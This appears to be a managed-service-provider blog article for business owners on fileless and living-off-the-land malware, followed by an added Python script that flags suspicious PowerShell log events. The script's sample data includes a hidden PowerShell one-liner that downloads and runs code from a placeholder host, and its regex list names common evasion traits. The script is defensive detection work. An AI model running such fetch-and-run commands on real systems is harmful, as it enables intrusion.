As a business owner or manager, you know the importance of keeping your company safe from cyber threats. However, in recent years, a new type of malware has emerged that may not be on your radar: fileless malware.
This insidious type of malware has been on the rise, with some estimates showing that up to 77% of successful attacks now use fileless exploits. In this article, we will explore what fileless malware is, the types you should be aware of, and how to protect your business from these unseen and dangerous attacks.
What is Fileless Malware?
First, let’s define what we mean by fileless malware. We are actually combining two terms under one umbrella here: fileless malware and LOTL (Living off the Land). Both are techniques used by cybercriminals to evade detection by traditional antivirus solutions, but they differ in how they carry out the attack. Fileless malware executes malicious code in memory without leaving a trace on disk, while LOTL leverages legitimate tools and applications already present on the system.
Both contrast with traditional malware, which is delivered to a victim’s computer in the form of a file, such as an executable or a document with a macro. Once the file is executed, the malware is activated and can begin its attack.
The top areas of fileless malware and LOTL include:
- PowerShell – a command-line shell and scripting language that is installed by default on Windows operating systems.
- Windows Management Instrumentation (WMI) – a system management technology that provides a standardized way for developers to access and manipulate system data on Windows.
- Word Macros / VBS (Visual Basic Scripting) – a popular scripting language used by cybercriminals to create fileless malware that can evade detection by traditional antivirus software. Due to its ease of use and versatility, VBS remains a prevalent choice for threat actors looking to develop fileless malware.
- .NET – a software development framework commonly used by Microsoft Office, Visual Studio, Adobe Suite, and QuickBooks. The versatility and functionality offered by the .NET framework also make it a popular choice among cybercriminals for developing fileless malware.
- Web browsers – attackers may exploit vulnerabilities in web browsers like Chrome or Firefox to execute code in the context of the user’s web session.
These are just a few examples, as there are many different programs and processes that could potentially be exploited by fileless malware attacks.
The Rise of Fileless Malware Attacks
According to the 2020 SonicWall Cyber Threat Report, while malware decreased 6% globally, new threats have begun to mask their exploits within today’s most trusted files. Office (20.3%) and PDFs (17.4%) represent 38% of new threats detected by Capture ATP.
This means that traditional antivirus software may not be able to detect fileless malware. In fact, a study by Ponemon Institute found that 77% of successful attacks now use fileless exploits to evade traditional signature-based antivirus software.
Types of Fileless Malware and What Each Can Mean to Your Business
There are several types of fileless malware that you should be aware of. First, there is PowerShell-based malware, which abuses the scripting language that is built into Windows. Attackers can use PowerShell to launch malicious code and perform actions on the victim’s machine, such as stealing data or installing more malware. This type is particularly effective because PowerShell is a legitimate tool that is trusted by most antivirus software.
Another type is called “living off the land” or “LOL” malware. This type of malware takes advantage of legitimate tools and processes that are already installed on the victim’s machine. By using trusted applications, LOL malware can evade detection and perform its malicious actions, such as stealing credentials or spreading to other machines on the network.
Finally, there is polymorphic fileless malware, which modifies functions and processes without needing to be a standalone file. This makes it difficult to detect and stop. According to Dark Reading, 24% of respondents in a recent survey cited polymorphic fileless malware as a major area of concern, up from 14% the previous year.
Fileless Malware Examples
Fileless malware can be used for a variety of attacks, such as stealing data, spreading to other machines on the network, or encrypting files for ransom. Here are a couple of examples:
- There’s the Emotet trojan, which has been used in several high-profile attacks. One notable example of the impact of Emotet was the 2019 attack on the city of Allentown, Pennsylvania. The city’s computer systems were infected with Emotet, which caused widespread disruption to municipal services, including the police department, fire department, and city hall. The city was forced to shut down its computer network for several weeks, causing significant financial losses and disrupting services for residents.
- In 2020, a variant of the infamous Ryuk ransomware emerged that was completely fileless. The ransomware was able to encrypt files and demand a ransom without leaving any trace on the system’s hard drive. The attack affected multiple organizations in the healthcare industry, causing significant disruption and financial losses.
Fileless Malware Protection
Given the stealthy and sophisticated nature of this type of threat, it’s crucial to implement a layered approach to cybersecurity. Here are some key steps to take to protect your business from attacks:
- Keep your software up-to-date: Make sure all of your software and operating systems are up-to-date with the latest patches and security updates.
- Implement endpoint security solutions: As mentioned earlier, traditional antivirus software may not be enough to protect against these attacks. Consider investing in more advanced endpoint security solutions that can detect and prevent fileless malware.
- Utilize behavioral analysis and machine learning: These technologies can help detect and prevent fileless malware attacks by identifying abnormal behavior patterns and blocking malicious activity.
- Limit user privileges: Restricting user access and privileges can limit the damage that fileless malware can cause. For example, only granting administrative access to users who truly need it.
- Educate your employees: Training employees on safe browsing habits, recognizing phishing attempts, and other best practices can help prevent fileless malware attacks.
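As an added example (not code from the original article), here is the kind of behavioral check the “behavioral analysis” step describes, run over constructed PowerShell Script Block Logging events (Event ID 4104) rather than file signatures. The JSON field names, the indicator patterns, their weights and the alert threshold are all assumptions made for the demonstration.

```python
"""Behavioral triage of PowerShell Script Block Logging events (ID 4104).
Added example, not from the article; field names, indicators, weights and threshold are assumptions."""
import json
import re

# (name, pattern matched against ScriptBlockText, weight); no single hit proves malice, co-occurrence does.
INDICATORS = [
    ("encoded_command", re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I), 3),
    ("hidden_window", re.compile(r"-w(indowstyle)?\s+hidden", re.I), 2),
    ("policy_bypass", re.compile(r"-e(x|p|xec|xecutionpolicy)?\s+bypass", re.I), 2),
    ("in_memory_execution", re.compile(r"downloadstring|\biex\b|invoke-expression", re.I), 3),
    ("wmi_process_create", re.compile(r"win32_process.*\bcreate\b|invoke-wmimethod", re.I), 2),
]
ALERT_THRESHOLD = 4  # one LOTL trait alone (e.g. a WMI call) does not alert

def score_script_block(text):
    """Return (score, indicator names) for one ScriptBlockText value."""
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits

def triage_events(lines):
    """Parse JSON-lines events; return alerts whose score meets the threshold."""
    alerts = []
    for line in lines:
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue  # tolerate a truncated export line instead of aborting
        if ev.get("EventID") != 4104:
            continue  # only script-block text is scored here
        score, hits = score_script_block(ev.get("ScriptBlockText", ""))
        if score >= ALERT_THRESHOLD:
            alerts.append({"host": ev.get("Computer"), "user": ev.get("User"),
                           "score": score, "indicators": hits})
    return alerts

def sample_lines():
    """Constructed export for demonstration; not real telemetry."""
    events = [
        {"EventID": 4104, "Computer": "WS01", "User": "CORP\\jdoe",
         "ScriptBlockText": "Get-ChildItem C:\\Reports | Measure-Object"},
        {"EventID": 4104, "Computer": "WS02", "User": "CORP\\asmith", "ScriptBlockText":
         "powershell -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage')\""},
        {"EventID": 4104, "Computer": "WS03", "User": "CORP\\svc", "ScriptBlockText":
         "Invoke-WmiMethod -Class Win32_Process -Name Create -ArgumentList 'notepad.exe'"},
        {"EventID": 4104, "Computer": "WS04", "User": "CORP\\bwong",
         "ScriptBlockText": "powershell -NoP -W Hidden -Enc QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
        {"EventID": 4103, "Computer": "WS03", "User": "CORP\\svc"},
    ]
    return [json.dumps(e) for e in events]
```

Running `triage_events(sample_lines())` flags WS02 and WS04 while the lone WMI call on WS03 stays below the threshold, which is the point: a single legitimate-tool invocation is normal, several evasion traits together are not.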
In conclusion, protecting your business from the unseen and dangerous threat of fileless malware attacks can be a complex and challenging task. This is where partnering with a Managed Service Provider (MSP) can be invaluable.
It’s important to stay up-to-date on the latest threats and implement a layered approach to cybersecurity that includes advanced endpoint security solutions, behavioral analysis, and machine learning. Additionally, restricting user privileges and educating employees on best practices can help prevent attacks. A lot of times, we see businesses struggle to handle all of this internally.
By taking a proactive approach to cybersecurity, you can help protect your business from the unseen and dangerous threat of fileless malware attacks.